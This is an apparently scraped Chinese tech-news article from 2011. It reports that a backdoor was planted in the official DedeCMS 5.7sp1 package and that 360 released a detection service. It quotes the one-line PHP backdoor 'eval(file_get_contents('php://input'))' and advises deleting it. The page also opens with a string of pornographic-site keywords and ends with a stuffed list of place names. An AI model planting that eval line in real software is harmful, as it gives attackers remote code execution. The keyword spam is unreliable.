日韩欧美综合-国产色影院-黄色欧美大片-奶茶视频黄色-无码粉嫩虎白一线天在线观看-亚洲天堂手机在线-亚洲欧美日本在线-日本特级黄色-亚洲tv在线-婷婷激情综合-亚洲精品无-成人免费黄色-亚洲色图久久久-色噜噜狠狠狠综合曰曰曰-精品久久久精品-蜜臀av在线播放-国产美女高潮流白浆视频

DedeCMS官方版本驚曝后門 360緊急推出安全檢測

作者:IT新聞網(wǎng) 來源:IT新聞網(wǎng) 2011-12-30 03:12:26 閱讀 我要評論 直達商品

360建議,使用DedeCMS的網(wǎng)站站長應(yīng)立刻檢測include/shoper.class.php文件中是否存在后門代碼"@eval(file_get_contents('php://input'));",如存在應(yīng)刪除該行代碼,如不存在則證明沒有該"一句話后門"。

【IT商業(yè)新聞網(wǎng)訊】日前,織夢內(nèi)容管理系統(tǒng)(DedeCMS)遭烏云漏洞平臺曝光稱,DedeCMS 5.7sp1官方安裝包被黑客植入后門。經(jīng)360安全檢測平臺檢測,該后門確實曾一度出現(xiàn)在織夢官網(wǎng)版本中。為此,360于當天緊急推出DedeCMS后門檢測服務(wù),并已對大批中招網(wǎng)站發(fā)出郵件報警。

360網(wǎng)站安全檢測平臺服務(wù)網(wǎng)址:http://webscan.#

圖1:DedeCms被植入的后門代碼

據(jù)悉,DedeCMS正廣泛應(yīng)用于眾多企業(yè)網(wǎng)站、政府網(wǎng)站、高校網(wǎng)站及個人網(wǎng)站上,是國內(nèi)用戶量最大的PHP類CMS系統(tǒng)。360安全工程師分析發(fā)現(xiàn),此次DedeCMS曝出的后門名為"一句話后門",其惡意代碼存在于DedeCMS購物車類文件中,凡是調(diào)用該購物車類的文件均會觸發(fā)后門,從而導(dǎo)致整個網(wǎng)站甚至服務(wù)器遭黑客進一步控制。

360建議,使用DedeCMS的網(wǎng)站站長應(yīng)立刻檢測include/shoper.class.php文件中是否存在后門代碼"@eval(file_get_contents('php://input'));",如存在應(yīng)刪除該行代碼,如不存在則證明沒有該"一句話后門"。

作為開源軟件,DedeCMS此次曝出后門并非個例。因為在國際上,Linux等多款著名的開源軟件也曾遭黑客植入后門。不過,烏云漏洞平臺公開的織夢官方郵件顯示,織夢開發(fā)團隊否認了產(chǎn)品曾被植入后門,但其官網(wǎng)上的DedeCMS版本在3月21日中午悄然進行了修改。

圖2:測試驗證PHP代碼可被DedeCMS后門執(zhí)行


  推薦閱讀

  李開復(fù)微博稱中國O2O機會大 但并不好做

李開復(fù)在微博寫道:“O2O就是(1)幫助線上用戶發(fā)現(xiàn)和推薦消費場所,(2)為線下服務(wù)業(yè)帶來線上客流,(3)可以檢測效果,最好可以線上支付。美國的O2O往往是幫助已上線的商家拉顧客,但是中國線下商家一般對互聯(lián)網(wǎng)認知和接>>>詳細閱讀


本文標題:DedeCMS官方版本驚曝后門 360緊急推出安全檢測

地址:http://m.sh-jijian.com/a/guandian/yejie/20111230/161793.html

樂購科技部分新聞及文章轉(zhuǎn)載自互聯(lián)網(wǎng),供讀者交流和學(xué)習(xí),若有涉及作者版權(quán)等問題請及時與我們聯(lián)系,以便更正、刪除或按規(guī)定辦理。感謝所有提供資訊的網(wǎng)站,歡迎各類媒體與樂購科技進行文章共享合作。

網(wǎng)友點評
我的評論: 人參與評論
驗證碼: 匿名回答
網(wǎng)友評論(點擊查看更多條評論)
友情提示: 登錄后發(fā)表評論,可以直接從評論中的用戶名進入您的個人空間,讓更多網(wǎng)友認識您。
吴旗县| 谷城县| 剑河县| 长海县| 香格里拉县| 封开县| 姜堰市| 毕节市| 丹阳市| 涟源市| 北京市| 华容县| 抚顺县| 蒙自县| 普安县| 福州市| 湟源县| 苏尼特右旗| 商丘市| 宜川县| 开封县| 平武县| 高尔夫| 乳山市| 林甸县| 英吉沙县| 洮南市| 邳州市| 胶州市| 新乡市| 通渭县| 红河县| 额敏县| 莱州市| 察哈| 古交市| 正宁县| 婺源县| 西乌珠穆沁旗| 侯马市| 富源县|